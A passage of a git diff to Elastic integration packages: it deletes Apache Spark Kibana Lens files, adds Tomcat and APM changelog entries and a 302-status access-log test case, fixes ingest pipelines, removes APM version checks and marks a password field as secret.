"78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:a871806a-160b-4da4-bcd5-700175899a73", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:55f22446-ec98-430e-b92e-0660335ab2d9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:1723d45d-1e3e-422c-921d-06a9ad1d3309", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:59410b0e-e834-4387-b6a8-dd1e252c87c9", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json b/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json deleted file mode 100644 index cff1a4f2ee7..00000000000 --- a/packages/apache_spark/kibana/lens/apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3a277aff-7c7b-443b-bccf-271cb4486f72": { - "columnOrder": [ - "08a11063-090b-4210-a4e4-30189048b7aa" - ], - "columns": { - "08a11063-090b-4210-a4e4-30189048b7aa": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.bytes.read" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", - "key": "apache_spark.executor.bytes.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.bytes.read" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "08a11063-090b-4210-a4e4-30189048b7aa", - "layerId": "3a277aff-7c7b-443b-bccf-271cb4486f72", - "layerType": "data" - } - }, - "title": "Number of Bytes Read [Metrics Apache Spark]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8", - "migrationVersion": { - "lens": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json b/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json deleted file mode 100644 index db5867b0782..00000000000 --- a/packages/apache_spark/kibana/lens/apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5d66805e-b15a-4a65-b914-128afac75b09": { - "columnOrder": [ - "55aa8a79-a965-4ad3-bd75-1182fc29570e" - ], - "columns": { - "55aa8a79-a965-4ad3-bd75-1182fc29570e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Written", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.bytes.written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", - "key": "apache_spark.executor.bytes.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.bytes.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "55aa8a79-a965-4ad3-bd75-1182fc29570e", - "layerId": "5d66805e-b15a-4a65-b914-128afac75b09", - "layerType": "data" - } - }, - "title": "Number of Bytes Written [Metrics Apache Spark]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8", - "migrationVersion": { - "lens": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/apache_spark/manifest.yml b/packages/apache_spark/manifest.yml index 908df531099..766a86fa8ba 100644 --- a/packages/apache_spark/manifest.yml +++ b/packages/apache_spark/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: apache_spark title: Apache Spark -version: "1.0.0" +version: "1.0.3" description: Collect metrics from Apache Spark with Elastic Agent. type: integration categories: diff --git a/packages/apache_spark/validation.yml b/packages/apache_spark/validation.yml index efdb1de132d..bcc8f74ac3a 100644 --- a/packages/apache_spark/validation.yml +++ b/packages/apache_spark/validation.yml @@ -1,4 +1,3 @@ errors: exclude_checks: - - SVR00004 - SVR00002 diff --git a/packages/apache_tomcat/changelog.yml b/packages/apache_tomcat/changelog.yml index 4e1e8dce221..9bbc5974ce4 100644 --- a/packages/apache_tomcat/changelog.yml +++ b/packages/apache_tomcat/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.3.3" + changes: + - description: Fix event.outcome for redirection status_codes 3xx. + type: bugfix + link: https://github.com/elastic/integrations/pull/9348 +- version: "1.3.2" + changes: + - description: Fix non-matching grok patterns in access log pipeline for 302 errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9243 +- version: "1.3.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.3.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.2.0" changes: - description: Improve apache_tomcat.access pipeline performance @@ -6,7 +31,7 @@ link: https://github.com/elastic/integrations/pull/8723 - version: "1.1.1" changes: - - description: Improve wording on milliseconds in apache_tomcat time field + - description: Improve wording on milliseconds in apache_tomcat time field type: enhancement link: https://github.com/elastic/integrations/pull/8701 - version: "1.1.0" diff --git a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log index 0fd8d1d1d81..5df7d49fd0f 100644 --- a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log +++ b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log @@ -1,4 +1,5 @@ 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 81.2.69.145 + 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.2" +81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 302 - 81.2.69.145 + 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.2" 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 X 400 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1" 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 50 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="" 81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] "POST /host-manager/images/asf-logo.svg HTTP/1.1" 200 20486 81.2.69.145 40 "http://localhost:8080/host-manager/html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" X-Forwarded-For="127.0.0.1, 127.0.0.3" diff --git a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json index ff88519e58e..f962cab04f3 100644 --- a/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json +++ b/packages/apache_tomcat/data_stream/access/_dev/test/pipeline/test-access.log-expected.json @@ -82,6 +82,85 @@ "version": "109.0.0.0" } }, + { + "@timestamp": "2023-03-02T13:28:17.000Z", + "apache_tomcat": { + "access": { + "connection_status": "+", + "http": { + "ident": "-", + "useragent": "admin" + }, + "ip": { + "local": "81.2.69.145" + }, + "response_time": 400.0 + } + }, + "client": { + "ip": [ + "127.0.0.1", + "127.0.0.2" + ] + }, + "ecs": { + "version": "8.7.0" + }, + "event": { + "category": [ + "web" + ], + "kind": "event", + "module": "apache_tomcat", + "original": "81.2.69.144 - admin [02/Mar/2023:18:58:17 +0530] \"POST /host-manager/images/asf-logo.svg HTTP/1.1\" 302 - 81.2.69.145 + 400 \"http://localhost:8080/host-manager/html\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\" X-Forwarded-For=\"127.0.0.1, 127.0.0.2\"", + "outcome": "success", + "type": [ + "access" + ] + }, + "http": { + "request": { + "method": "POST", + "referrer": "http://localhost:8080/host-manager/html" + }, + "response": { + "status_code": 302 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "81.2.69.144", + "81.2.69.145", + "127.0.0.1", + "127.0.0.2" + ] + }, + "source": { + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "extension": "svg", + "original": "/host-manager/images/asf-logo.svg", + "path": "/host-manager/images/asf-logo.svg" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "109.0.0.0" + } + }, { "@timestamp": "2023-03-02T13:28:17.000Z", "apache_tomcat": { diff --git a/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml b/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml index eac23bc3599..980af1bcd1f 100644 --- a/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apache_tomcat/data_stream/access/elasticsearch/ingest_pipeline/default.yml @@ -42,7 +42,7 @@ processors: field: _tmp.dissectgrok tag: 'grok_parse_log_dissectgrok' patterns: - - '^%{NUMBER:http.response.status_code} %{POSINT:destination.bytes}( %{GREEDYDATA:_tmp.grok})?$' + - '^%{NUMBER:http.response.status_code} (-|%{POSINT:destination.bytes})( %{GREEDYDATA:_tmp.grok})?$' on_failure: - append: field: error.message @@ -97,11 +97,11 @@ processors: - set: field: event.outcome value: success - if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 200 && ctx.http.response.status_code < 300 + if: ctx.http?.response?.status_code != null && ctx.http.response.status_code < 400 - set: field: event.outcome value: failure - if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 400 && ctx.http.response.status_code < 600 + if: ctx.http?.response?.status_code != null && ctx.http.response.status_code >= 400 - remove: if: ctx.destination?.bytes == '-' field: destination.bytes diff --git a/packages/apache_tomcat/manifest.yml b/packages/apache_tomcat/manifest.yml index c0efd5eec71..82cc5038332 100644 --- a/packages/apache_tomcat/manifest.yml +++ b/packages/apache_tomcat/manifest.yml @@ -1,13 +1,13 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: apache_tomcat title: Apache Tomcat -version: "1.2.0" +version: "1.4.0" description: Collect and parse logs and metrics from Apache Tomcat servers with Elastic Agent. categories: ["web", "observability"] type: integration conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" policy_templates: - name: Apache Tomcat title: Apache Tomcat @@ -33,6 +33,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/apm/changelog.yml b/packages/apm/changelog.yml index 1f081ad12d4..bee1e095339 100644 --- a/packages/apm/changelog.yml +++ b/packages/apm/changelog.yml @@ -1,11 +1,24 @@ -- version: 8.13.0-preview-1 +- version: 8.13.1-preview-1708411360 changes: + - description: Remove version check + type: enhancement + link: https://github.com/elastic/integrations/pull/9185 +- version: 8.13.0 + changes: + - description: Add a new field transaction.profiler_stack_trace_ids to traces-apm + type: enhancement + link: https://github.com/elastic/integrations/pull/9080 - description: Migrate to package-spec v3 type: enhancement link: https://github.com/elastic/apm-server/pull/11822 - description: Add span.code.stacktrace type: enhancement link: https://github.com/elastic/apm-server/pull/12096 +- version: 8.12.2 + changes: + - description: Define value for all constant_keyword fields; Use ecs for sampled_traces + type: bugfix + link: https://github.com/elastic/apm-server/pull/12219 - version: 8.12.0 changes: - description: Add missing mappings for various fields diff --git a/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml index ad111db4e2a..75a7e8d4830 100644 --- a/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/app_logs/elasticsearch/ingest_pipeline/default.yml @@ -6,21 +6,6 @@ processors: ignore_failure: true ignore_missing: true target_field: process.parent.pid - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml index 98416f1fe6e..221b2ae048c 100644 --- a/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/app_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM application metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml index 05876a97f07..e3484d01a9c 100644 --- a/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/error_logs/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM error events. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml index 2c0168f20b9..5413becda31 100644 --- a/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/internal_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM internal metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml index ec20840cac6..6aa81894264 100644 --- a/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/rum_traces/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM RUM trace events. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/sampled_traces/fields/base-fields.yml b/packages/apm/data_stream/sampled_traces/fields/base-fields.yml index bef973826be..d23828424bf 100644 --- a/packages/apm/data_stream/sampled_traces/fields/base-fields.yml +++ b/packages/apm/data_stream/sampled_traces/fields/base-fields.yml @@ -1,12 +1,8 @@ - name: '@timestamp' - type: date - description: Event timestamp. + external: ecs - name: data_stream.type - type: constant_keyword - description: Data stream type. + external: ecs - name: data_stream.dataset - type: constant_keyword - description: Data stream dataset. + external: ecs - name: data_stream.namespace - type: constant_keyword - description: Data stream namespace. + external: ecs diff --git a/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml index 5680e9aa451..093d5a76d49 100644 --- a/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_1m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml index 5680e9aa451..bf44c821550 100644 --- a/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_1m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 1m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml index ac1034792f0..7d6fe42f17e 100644 --- a/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_destination_60m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service destination metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml b/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml index 5680e9aa451..f6fb5864698 100644 --- a/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_destination_60m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_destination description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 60m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- a/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml +++ b/packages/apm/data_stream/service_summary_10m_metrics/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,6 @@ --- description: Pipeline for ingesting APM service summary metrics. processors: - - grok: - field: observer.version - pattern_definitions: - DIGITS: (?:[0-9]+) - patterns: - - '%{DIGITS:observer.version_major:int}.%{DIGITS:observer.version_minor:int}.%{DIGITS:observer.version_patch:int}(?:[-+].*)?' - - fail: - if: ctx.observer.version_major > 8 || (ctx.observer.version_major == 8 && ctx.observer.version_minor > 13) - message: Document produced by APM Server v{{{observer.version}}}, which is newer than the installed APM integration (v8.13.0). The APM integration must be upgraded. - - remove: - field: - - observer.version_major - - observer.version_minor - - observer.version_patch - ignore_missing: true - remove: field: - observer.id diff --git a/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml b/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml index 9f51d990a5f..1f74c1a1190 100644 --- a/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml +++ b/packages/apm/data_stream/service_summary_10m_metrics/fields/fields.yml @@ -1,8 +1,10 @@ - name: metricset.name type: constant_keyword + value: service_summary description: Name of the set of metrics. - name: metricset.interval type: constant_keyword + value: 10m description: Metricset aggregation interval. - name: processor.event type: constant_keyword diff --git a/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml b/packages/apm/data_stream/service_summary_1m_metrics/elasticsearch/ingest_pipeline/default.yml index cdeeaf902d6..2cd7443e6ba 100644 --- 